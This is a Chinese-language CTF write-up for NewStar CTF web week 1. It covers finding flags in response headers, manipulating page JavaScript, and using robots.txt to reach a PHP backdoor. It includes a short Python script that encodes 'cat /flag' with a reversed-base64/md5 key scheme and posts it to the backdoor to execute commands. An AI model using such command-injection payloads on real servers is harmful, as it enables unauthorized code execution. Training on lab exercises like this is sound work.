2025-1-21 Newstar CTF web week1 wp

文章目录

week1

headach3

根据提示,在页面的请求头里找到flag

flag{You_Ar3_R3Ally_A_9ooD_d0ctor}

会赢吗

打开控制台,拿到第一部分flag

将地址栏改为提示,去到下一关

控制台调用函数,得到flag

进入第三关,看到与第二关很相似,同样是向一个地方发数据,根据响应拿到flag,但是第二关没有完成该功能的函数,猜测是要自己写一个脚本数据过去

看题解才发现原来是要修改if指向的条件值

去到第四关,修改设置禁用js,拿到flag,最后将所有flag进行base64解码即可

智械危机

进来看到提示flag跟robots相关,访问robots.txt,(这里为什么要访问这个地址,也是在一次ai的过程里突然理解)得到一个地址,进入

函数部分的逻辑好理解,接下来解释一下if部分的逻辑

所以我们所看到的当前网页其实就是else语句执行后的结果

在题目的源码里,我们可以看到解码后的命令会被执行,因此,可以发送一个获取flag的命令过去,也就是一个webshell

python 复制代码
from hashlib import *
from random import  *
from requests import *
from tqdm import *
import uuid
import base64
url='http://127.0.0.1:59206//backd0or.php'
cmd='cat /flag'
base_cmd=base64.b64encode(cmd.encode()).decode()
rev_base_cmd=base_cmd[::-1]
key=base64.b64encode(md5(rev_base_cmd.encode()).hexdigest().encode()).decode()
payload={
    'cmd':base_cmd,
    'key':key
}
responce=post(url,data=payload)
print(responce.text)
相关推荐
wang.wenchao几秒前
十六进制文本码流转pcap(text2pcap)
前端·css
浪浪山小白兔18 分钟前
HTML 基础入门:核心标签全解析
前端·javascript·html
浪浪山小白兔19 分钟前
HTML `<head>` 元素详解
前端·html
Milk夜雨34 分钟前
Vue.js 入门教程:快速上手
前端·javascript·vue.js
noravinsc35 分钟前
vue md5加密
前端·javascript·vue.js
海的预约37 分钟前
VUE之参数传递
前端·javascript·vue.js
清风细雨_林木木39 分钟前
Element中为什么不使用prop重置无法生效
前端·javascript·vue.js
傻小胖2 小时前
react19新API之use()用法总结
前端·javascript·react.js
傻小胖2 小时前
React 19 新特性总结
前端·javascript·react.js
白嫖叫上我2 小时前
Element修改表格结构样式集合(后续实时更新)
前端·vue.js·elementui